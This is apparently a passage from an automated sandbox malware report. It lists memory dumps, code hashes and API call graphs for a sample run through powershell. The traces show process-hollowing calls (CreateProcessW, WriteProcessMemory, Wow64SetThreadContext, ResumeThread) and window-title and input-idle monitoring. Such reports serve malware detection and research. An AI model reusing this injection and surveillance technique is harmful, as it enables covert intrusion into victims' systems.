                                                                        • Opcode Fuzzy Hash: dfea9ae4210891935b2ce8b423cfb3105e3ac4bad8b86d02603c2707dedfd0c1
                                                                        • Instruction Fuzzy Hash: 6B5129A144E7D0AFEB03577808762A67FB08E57290B0E29CBC4D1CF0B3E008591AE323
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.515392859.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1ed000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c33c933a9e53b7e4bd2a4b3d8f13627f5f8b55e0a17e4bd1bb81edd932bf87c4
                                                                        • Instruction ID: 0d899b4254ef2907703a2695b2e9d0455626b33bb7b33db2a9730224cae98089
                                                                        • Opcode Fuzzy Hash: c33c933a9e53b7e4bd2a4b3d8f13627f5f8b55e0a17e4bd1bb81edd932bf87c4
                                                                        • Instruction Fuzzy Hash: 7801DF70104780EAE7248A26E884B6ABB98DF81764F2CC41AEC590B286C3799941CAB1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.515392859.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1ed000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3a822ed6141203bc0d65c5579195ec64e1bcbfbd2b4a62199ce06f493995363
                                                                        • Instruction ID: 98cebd529b1fc3613cefeece696b419aa4073959a3b273c3d71a134953ae6ae6
                                                                        • Opcode Fuzzy Hash: f3a822ed6141203bc0d65c5579195ec64e1bcbfbd2b4a62199ce06f493995363
                                                                        • Instruction Fuzzy Hash: 7D014C7100E3C09FE7128B259C94B56BFB4DF43624F1D81DBE8888F1A7C2695848C772

                                                                        Execution Graph

                                                                        Execution Coverage:11.5%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:46
                                                                        Total number of Limit Nodes:2
                                                                        • Execution graph rooted at 1f4b40; API nodes reached: CreateProcessW (1f172c, 1f5930), Wow64SetThreadContext (1f1738, 1f1780, 1f5c68), WriteProcessMemory (1f1774, 1f5f98; invoked repeatedly from the loop at 1f537c), ResumeThread (1f1798, 1f60d8) (serialized graph rendering omitted)

                                                                        Control-flow Graph
                                                                        • Entry block 35203c; basic blocks span 35203c-35244d (serialized graph rendering omitted)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L4#p$L4#p$L4#p$d=,
                                                                        • API String ID: 0-59673657
                                                                        • Opcode ID: 63d67c2bf6371f378544a2d26dccf60db4321041b5001db2a8963d1dfa94149d
                                                                        • Instruction ID: 0756532dbf222e01e3ce330d15c7e6370fb4512932ab5c0da7729724a273c077
                                                                        • Opcode Fuzzy Hash: 63d67c2bf6371f378544a2d26dccf60db4321041b5001db2a8963d1dfa94149d
                                                                        • Instruction Fuzzy Hash: EAB1F535700244DFDF269F64C840FAF7BA2AF86312F15846AED058B2A1DB75CD89CB91

                                                                        Control-flow Graph
                                                                        • Entry block 350b98; basic blocks span 350b98-3511cf (serialized graph rendering omitted)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8#f$8#f$l;,$l;,
                                                                        • API String ID: 0-1656524266
                                                                        • Opcode ID: 3c90f6a0ef55a32e8bf59bed040914631f01486464d1d021464743e907c40837
                                                                        • Instruction ID: 5129198256acded9d490d83e20982755efd1f69fc3abff4a99a4b1f1f58ebb81
                                                                        • Opcode Fuzzy Hash: 3c90f6a0ef55a32e8bf59bed040914631f01486464d1d021464743e907c40837
                                                                        • Instruction Fuzzy Hash: 9FF15531B00301CFDB2A9A68C850B6AB7F5AFD1312F25847ADC59DB2A1DB72CD49C761

                                                                        Control-flow Graph
                                                                        • Entry block 1f172c; basic blocks span 1f172c-1f5c36; CreateProcessW is called in block 1f5a47-1f5b22; block 1f5c36 loops on itself (serialized graph rendering omitted)
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001F5B0F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: e430ba4fb794dc1a12b95206bb7a582ac528f58111ce15dc75ae3bd59c92672e
                                                                        • Instruction ID: 5db63cddd77f10c6f97c1582523b31e11f99ffd40d220973601441c83445fee4
                                                                        • Opcode Fuzzy Hash: e430ba4fb794dc1a12b95206bb7a582ac528f58111ce15dc75ae3bd59c92672e
                                                                        • Instruction Fuzzy Hash: 3881CFB4D0026DDFDB25CFA4C880BEDBBB1AB49304F1490AAE649B7210D7749A85CF94

                                                                        Control-flow Graph
                                                                        • Entry block 1f592e; basic blocks span 1f592e-1f5c36; CreateProcessW is called in block 1f5a47-1f5b22; block 1f5c36 loops on itself (serialized graph rendering omitted)
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001F5B0F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: e07ffbce9387bf1245a9e1afcc08cec501ab15cf94df339bd31d2b11d580ebeb
                                                                        • Instruction ID: 4a6615c8974743c9cb2267227518ce035f2f14973f8eaefed8e5ba5a6482d06a
                                                                        • Opcode Fuzzy Hash: e07ffbce9387bf1245a9e1afcc08cec501ab15cf94df339bd31d2b11d580ebeb
                                                                        • Instruction Fuzzy Hash: 9681C0B4D0026DDFDF25CFA4C880BEDBBB1AB49304F1490AAE649B7250D7749A85CF94

                                                                        Control-flow Graph
                                                                        • Entry block 1f1774; basic blocks span 1f1774-1f60bd; WriteProcessMemory is called in block 1f6016-1f6076 (serialized graph rendering omitted)
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001F6066
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 0b0c38d8b34ca0598546110aa874f65bb8fbb1a3f022918e6c460c405db4bcf7
                                                                        • Instruction ID: ff0bce298b7c27a08c5be295e1ee02cb79e58ad1102e3070c2dba4dac8ab6af1
                                                                        • Opcode Fuzzy Hash: 0b0c38d8b34ca0598546110aa874f65bb8fbb1a3f022918e6c460c405db4bcf7
                                                                        • Instruction Fuzzy Hash: 384189B5D14258DFCF10CFA9D984AEEFBF1BB49310F24902AE918B7210D375AA45CB64

                                                                        Control-flow Graph
                                                                        • Entry block 1f5f91; basic blocks span 1f5f91-1f60bd; WriteProcessMemory is called in block 1f6016-1f6076 (serialized graph rendering omitted)
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001F6066
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: e3a1e85781adb3e210b680a3297468c2318a236e1b4a723aacbf1509a60b1f9f
                                                                        • Instruction ID: 9d3363e9460c6763e3afb88b04857f6090faa47e87ffa738176d7f57cc75f094
                                                                        • Opcode Fuzzy Hash: e3a1e85781adb3e210b680a3297468c2318a236e1b4a723aacbf1509a60b1f9f
                                                                        • Instruction Fuzzy Hash: 40418AB5D00258DFCF00CFA9D984AEEFBF1BB49310F24902AE918B7210D375AA45CB64

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001F5D12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: c8dcb18be1f50f2d685e66059b1f8f54cce636b5a73d420e34fdccdc77905c87
                                                                        • Instruction ID: 1e68a413fb3e8db23ae72935fb78d66a85fbe1093ccf6f7ecbf6bcfaca5db48c
                                                                        • Opcode Fuzzy Hash: c8dcb18be1f50f2d685e66059b1f8f54cce636b5a73d420e34fdccdc77905c87
                                                                        • Instruction Fuzzy Hash: D931AAB5D012589FDB10CFAAD984AEEFBF1BB49314F24802AE514B7310D378AA45CF64

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001F5D12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 850ede4bfb59aa7ce206f40e91cfd5ec599b24b8f47b2a6db51d5f5fe6a56d4f
                                                                        • Instruction ID: 99d77beff4454b18cf63bfc5512532fd4fcb53e97b97d7071689a332856ecdd4
                                                                        • Opcode Fuzzy Hash: 850ede4bfb59aa7ce206f40e91cfd5ec599b24b8f47b2a6db51d5f5fe6a56d4f
                                                                        • Instruction Fuzzy Hash: 24319BB5D052589FCB10CFA9D984AEEFBF1BB49314F24802AE519B7310D374AA45CF64

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001F5D12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 7b6c6cd8728f7d810af39adb4b452f5e471e90563ed6911cf91c3638286106c0
                                                                        • Instruction ID: 2a5e1eb470cd6f31b99aee2b7fc299a73de47ac6aebf381062c41f63bc2bbd1a
                                                                        • Opcode Fuzzy Hash: 7b6c6cd8728f7d810af39adb4b452f5e471e90563ed6911cf91c3638286106c0
                                                                        • Instruction Fuzzy Hash: D0319BB5D052589FCB10CFA9D984AEEFBF1BB49314F24802AE519B7310D374AA45CFA4

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 001F614E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: f0b1b0cfc6607658614e03c4719ce23d73dfd00bb85025747e77cb48ec151d45
                                                                        • Instruction ID: 0607955ee9cd3ef5f12c08c0895436bd4887e2f0c14c68dac3410cbcfeafab0e
                                                                        • Opcode Fuzzy Hash: f0b1b0cfc6607658614e03c4719ce23d73dfd00bb85025747e77cb48ec151d45
                                                                        • Instruction Fuzzy Hash: 5F21AAB9D042089FDB10CFA9D984ADEFBF4AB49314F24901AE918B7310C374A945CFA5

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 001F614E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: d797d1c06d8c89210c9411eedfd3da97d44dad26abfba2caaddbce9ae5837826
                                                                        • Instruction ID: 99de71c192073504b34c3ea3430fd2c5a986e6fb5b25bd6d2428b6608661ea47
                                                                        • Opcode Fuzzy Hash: d797d1c06d8c89210c9411eedfd3da97d44dad26abfba2caaddbce9ae5837826
                                                                        • Instruction Fuzzy Hash: 6E218CB4D042589FCB10CFA9D984AEEFBF4AB49314F24906AE918B7310D375A945CFA4

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa32ce2301ea289eb8108552225d78cef8f0ba81d739a5260d9d0e1d2f5f48f7
                                                                        • Instruction ID: 5f5c06e01df14110fba536aff9ff8b3687c380bdf5a45111c3b8eeb4f122343e
                                                                        • Opcode Fuzzy Hash: fa32ce2301ea289eb8108552225d78cef8f0ba81d739a5260d9d0e1d2f5f48f7
                                                                        • Instruction Fuzzy Hash: E9410636700201DBDB3B4E28D400BBAB7A5AF95313B2985BADC558B271DBB4CD49C751
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510105680.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df4e3a83ea8a3c786d514c25c46520c294658363d16c38028515e7b32cd8adf4
                                                                        • Instruction ID: 8c99c99fc894c3fd347e191e0a4d8e68cb4454bd7a943a57e08e2177e251a0fb
                                                                        • Opcode Fuzzy Hash: df4e3a83ea8a3c786d514c25c46520c294658363d16c38028515e7b32cd8adf4
                                                                        • Instruction Fuzzy Hash: 9501F730508340EAE7344A15DC84767BB98DF81765F28C416FC594F2C2C379994AC7B1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510105680.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 467731de589330c911ec02ca092c7cd3520ff6c93d7a1c48189e1d69959b5455
                                                                        • Instruction ID: a2ca83bee30b9ab9b45a8e9002c5bcf6b4d4128d81bfc8be980ab00dd8f1e372
                                                                        • Opcode Fuzzy Hash: 467731de589330c911ec02ca092c7cd3520ff6c93d7a1c48189e1d69959b5455
                                                                        • Instruction Fuzzy Hash: D1015E6140E3C09FD7228B219C94B52BFA4DF52625F19C1DBE8988F2E3C3699849C772
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3212976d2dffd3abfa269c7bb016abf5e6816b8f9ce441fd1a43c2f8a082e395
                                                                        • Instruction ID: 191b2137b1c6b67c30d9a93dd59edbeba9e597023268220ec324f7762eb2cc44
                                                                        • Opcode Fuzzy Hash: 3212976d2dffd3abfa269c7bb016abf5e6816b8f9ce441fd1a43c2f8a082e395
                                                                        • Instruction Fuzzy Hash: 94E0D831F44344CFDF2A666090217AE77516FA2252F1581E6CC5097665DB348809C362
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (:,$(:,$(:,$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:,$L:,$L:,
                                                                        • API String ID: 0-2198573534
                                                                        • Opcode ID: b92b4b1a1607b208ac6df7306bdea566e41a46d82679f0c0b1c1e96ca64e5184
                                                                        • Instruction ID: 87a0f7288f78cdd495edbe199978d6a83c582f1768eb9bcddeeab99af0fdb087
                                                                        • Opcode Fuzzy Hash: b92b4b1a1607b208ac6df7306bdea566e41a46d82679f0c0b1c1e96ca64e5184
                                                                        • Instruction Fuzzy Hash: 23D15731700208EFDF1A9F64C810FBE77A6AF81312F158429ED459B2A1CB72DD89CB91

                                                                        Execution Graph

                                                                        Execution Coverage: 5.6%
                                                                        Dynamic/Decrypted Code Coverage: 19.8%
                                                                        Signature Coverage: 3.4%
                                                                        Total number of Nodes: 1510
                                                                        Total number of Limit Nodes: 46
CreateEventA CreateThread WaitForSingleObject CloseHandle 53591->53592 53593 401fc9 53591->53593 53592->53573 53596 415aea 53592->53596 53595 4025e0 28 API calls 53593->53595 53595->53592 53597 4020f6 28 API calls 53596->53597 53598 415b0c SetEvent 53597->53598 53599 415b21 53598->53599 53675 4041a2 53599->53675 53602 4020f6 28 API calls 53603 415b4b 53602->53603 53604 4020f6 28 API calls 53603->53604 53605 415b5d 53604->53605 53678 41be1b 53605->53678 53609 415b86 GetTickCount 53700 41bb8e 53609->53700 53610 415ce5 53672 415cf9 53610->53672 53674 415cd6 53610->53674 53615 401fd8 11 API calls 53617 41709e 53615->53617 53619 401fd8 11 API calls 53617->53619 53618 415ba3 53620 41bb8e 28 API calls 53618->53620 53621 4170aa 53619->53621 53622 415bae 53620->53622 53706 41ba96 53622->53706 53627 401e65 22 API calls 53628 415bd8 53627->53628 53629 402f31 28 API calls 53628->53629 53630 415be6 53629->53630 53715 402ea1 28 API calls 53630->53715 53632 415bf5 53633 402f10 28 API calls 53632->53633 53634 415c04 53633->53634 53716 402ea1 28 API calls 53634->53716 53636 415c13 53637 402f10 28 API calls 53636->53637 53638 415c1f 53637->53638 53717 402ea1 28 API calls 53638->53717 53640 415c29 53641 404aa1 61 API calls 53640->53641 53642 415c38 53641->53642 53643 401fd8 11 API calls 53642->53643 53644 415c41 53643->53644 53645 401fd8 11 API calls 53644->53645 53646 415c4d 53645->53646 53647 401fd8 11 API calls 53646->53647 53648 415c59 53647->53648 53649 401fd8 11 API calls 53648->53649 53650 415c65 53649->53650 53651 401fd8 11 API calls 53650->53651 53652 415c71 53651->53652 53653 401fd8 11 API calls 53652->53653 53654 415c7d 53653->53654 53718 401f09 53654->53718 53657 401fd8 11 API calls 53658 415c8f 53657->53658 53659 401fd8 11 API calls 53658->53659 53660 415c98 53659->53660 53661 401e65 22 API calls 53660->53661 53662 415ca3 53661->53662 53721 43baac 53662->53721 53665 415cb5 53668 415cc3 53665->53668 53669 415cce 53665->53669 53666 415cdb 53667 401e65 22 API calls 
53666->53667 53667->53610 53725 404ff4 82 API calls 53668->53725 53726 404f51 53669->53726 53741 4050e4 84 API calls 53672->53741 53673 415cc9 53673->53674 53742 401e8d 53674->53742 53748 40423a 53675->53748 53679 4020df 11 API calls 53678->53679 53680 41be2e 53679->53680 53683 41bea0 53680->53683 53687 4041a2 28 API calls 53680->53687 53692 401fe2 28 API calls 53680->53692 53695 401fd8 11 API calls 53680->53695 53699 41be9e 53680->53699 53754 41ce34 28 API calls 53680->53754 53681 401fd8 11 API calls 53682 41bed0 53681->53682 53684 401fd8 11 API calls 53682->53684 53686 4041a2 28 API calls 53683->53686 53685 41bed8 53684->53685 53688 401fd8 11 API calls 53685->53688 53689 41beac 53686->53689 53687->53680 53690 415b66 53688->53690 53691 401fe2 28 API calls 53689->53691 53690->53609 53690->53610 53690->53674 53693 41beb5 53691->53693 53692->53680 53694 401fd8 11 API calls 53693->53694 53696 41bebd 53694->53696 53695->53680 53755 41ce34 28 API calls 53696->53755 53699->53681 53756 441e81 53700->53756 53703 402093 28 API calls 53704 415b97 53703->53704 53705 41bae6 GetLastInputInfo GetTickCount 53704->53705 53705->53618 53765 436e90 53706->53765 53711 41bd1e 53712 41bd2b 53711->53712 53713 4020b7 28 API calls 53712->53713 53714 415bca 53713->53714 53714->53627 53715->53632 53716->53636 53717->53640 53719 402252 11 API calls 53718->53719 53720 401f12 53719->53720 53720->53657 53722 43bac5 _strftime 53721->53722 53814 43ae03 53722->53814 53724 415cb0 53724->53665 53724->53666 53725->53673 53727 404f65 53726->53727 53728 404fea 53726->53728 53729 404f6e 53727->53729 53730 404fc0 CreateEventA CreateThread 53727->53730 53731 404f7d GetLocalTime 53727->53731 53728->53674 53729->53730 53730->53728 53885 405150 53730->53885 53732 41bb8e 28 API calls 53731->53732 53733 404f91 53732->53733 53884 4052fd 28 API calls 53733->53884 53741->53673 53743 402163 53742->53743 53744 40219f 53743->53744 53889 402730 11 API calls 53743->53889 53744->53615 53746 402184 53890 402712 11 API 
calls std::_Deallocate 53746->53890 53749 404243 53748->53749 53750 4023ce 11 API calls 53749->53750 53751 40424e 53750->53751 53752 402569 28 API calls 53751->53752 53753 4041b5 53752->53753 53753->53602 53754->53680 53755->53699 53757 441e8d 53756->53757 53760 441c7d 53757->53760 53759 41bbb2 53759->53703 53761 441c94 53760->53761 53763 441ccb __cftoe 53761->53763 53764 4405dd 20 API calls _free 53761->53764 53763->53759 53764->53763 53766 41bab5 GetForegroundWindow GetWindowTextW 53765->53766 53767 40417e 53766->53767 53768 404186 53767->53768 53773 402252 53768->53773 53770 404191 53777 4041bc 53770->53777 53774 4022ac 53773->53774 53775 40225c 53773->53775 53774->53770 53775->53774 53781 402779 11 API calls std::_Deallocate 53775->53781 53778 4041c8 53777->53778 53782 4041d9 53778->53782 53780 40419c 53780->53711 53781->53774 53783 4041e9 53782->53783 53784 404206 53783->53784 53785 4041ef 53783->53785 53799 4027e6 53784->53799 53789 404267 53785->53789 53788 404204 53788->53780 53790 402888 22 API calls 53789->53790 53791 40427b 53790->53791 53792 404290 53791->53792 53793 4042a5 53791->53793 53810 4042df 22 API calls 53792->53810 53794 4027e6 28 API calls 53793->53794 53798 4042a3 53794->53798 53796 404299 53811 402c48 22 API calls 53796->53811 53798->53788 53800 4027ef 53799->53800 53801 402851 53800->53801 53802 4027f9 53800->53802 53813 4028a4 22 API calls 53801->53813 53805 402802 53802->53805 53807 402815 53802->53807 53812 402aea 28 API calls __EH_prolog 53805->53812 53808 402813 53807->53808 53809 402252 11 API calls 53807->53809 53808->53788 53809->53808 53810->53796 53811->53798 53812->53808 53830 43ba0a 53814->53830 53816 43ae50 53836 43a7b7 53816->53836 53818 43ae15 53818->53816 53819 43ae2a 53818->53819 53821 43ae2f __cftoe 53818->53821 53835 4405dd 20 API calls _free 53819->53835 53821->53724 53823 43ae5c 53824 43ae8b 53823->53824 53844 43ba4f 40 API calls __Tolower 53823->53844 53827 43aef7 53824->53827 53845 43b9b6 20 API calls 2 library calls 
53824->53845 53846 43b9b6 20 API calls 2 library calls 53827->53846 53828 43afbe _strftime 53828->53821 53847 4405dd 20 API calls _free 53828->53847 53831 43ba22 53830->53831 53832 43ba0f 53830->53832 53831->53818 53848 4405dd 20 API calls _free 53832->53848 53834 43ba14 __cftoe 53834->53818 53835->53821 53837 43a7d4 53836->53837 53838 43a7ca 53836->53838 53837->53838 53849 448215 GetLastError 53837->53849 53838->53823 53840 43a7f5 53870 448364 36 API calls __Toupper 53840->53870 53842 43a80e 53871 448391 36 API calls __cftoe 53842->53871 53844->53823 53845->53827 53846->53828 53847->53821 53848->53834 53850 448237 53849->53850 53851 44822b 53849->53851 53873 445af3 20 API calls 3 library calls 53850->53873 53872 4487bc 11 API calls 2 library calls 53851->53872 53854 448231 53854->53850 53856 448280 SetLastError 53854->53856 53855 448243 53857 44824b 53855->53857 53880 448812 11 API calls 2 library calls 53855->53880 53856->53840 53874 446782 53857->53874 53860 448260 53860->53857 53862 448267 53860->53862 53861 448251 53864 44828c SetLastError 53861->53864 53881 448087 20 API calls __Toupper 53862->53881 53882 4460f4 36 API calls 4 library calls 53864->53882 53865 448272 53867 446782 _free 20 API calls 53865->53867 53869 448279 53867->53869 53868 448298 53869->53856 53869->53864 53870->53842 53871->53838 53872->53854 53873->53855 53875 44678d HeapFree 53874->53875 53879 4467b6 _free 53874->53879 53876 4467a2 53875->53876 53875->53879 53883 4405dd 20 API calls _free 53876->53883 53878 4467a8 GetLastError 53878->53879 53879->53861 53880->53860 53881->53865 53882->53868 53883->53878 53888 40515c 102 API calls 53885->53888 53887 405159 53888->53887 53889->53746 53890->53744 53891->53579 53892->53584 53893->53586 53894 445847 53895 445852 53894->53895 53897 44587b 53895->53897 53898 445877 53895->53898 53900 448a84 53895->53900 53907 44589f DeleteCriticalSection 53897->53907 53908 4484ca 53900->53908 53903 448ac9 InitializeCriticalSectionAndSpinCount 53904 448ab4 
53903->53904 53915 434fcb 53904->53915 53906 448ae0 53906->53895 53907->53898 53909 4484fa 53908->53909 53912 4484f6 53908->53912 53909->53903 53909->53904 53910 44851a 53910->53909 53913 448526 GetProcAddress 53910->53913 53912->53909 53912->53910 53922 448566 53912->53922 53914 448536 __crt_fast_encode_pointer 53913->53914 53914->53909 53916 434fd6 IsProcessorFeaturePresent 53915->53916 53917 434fd4 53915->53917 53919 435018 53916->53919 53917->53906 53929 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53919->53929 53921 4350fb 53921->53906 53923 448587 LoadLibraryExW 53922->53923 53924 44857c 53922->53924 53925 4485a4 GetLastError 53923->53925 53928 4485bc 53923->53928 53924->53912 53926 4485af LoadLibraryExW 53925->53926 53925->53928 53926->53928 53927 4485d3 FreeLibrary 53927->53924 53928->53924 53928->53927 53929->53921 53930 434887 53931 434893 ___FrameUnwindToState 53930->53931 53957 434596 53931->53957 53933 43489a 53935 4348c3 53933->53935 54263 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 53933->54263 53939 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 53935->53939 53968 444251 53935->53968 53946 434962 53939->53946 54264 4433e7 36 API calls 6 library calls 53939->54264 53940 4348e2 ___FrameUnwindToState 53976 434b14 53946->53976 53958 43459f 53957->53958 54269 434c52 IsProcessorFeaturePresent 53958->54269 53960 4345ab 54270 438f31 53960->54270 53962 4345b0 53967 4345b4 53962->53967 54279 4440bf 53962->54279 53965 4345cb 53965->53933 53967->53933 53969 444268 53968->53969 53970 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53969->53970 53971 4348dc 53970->53971 53971->53940 53972 4441f5 53971->53972 53973 444224 53972->53973 53974 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 53973->53974 53975 44424d 53974->53975 53975->53939 53977 
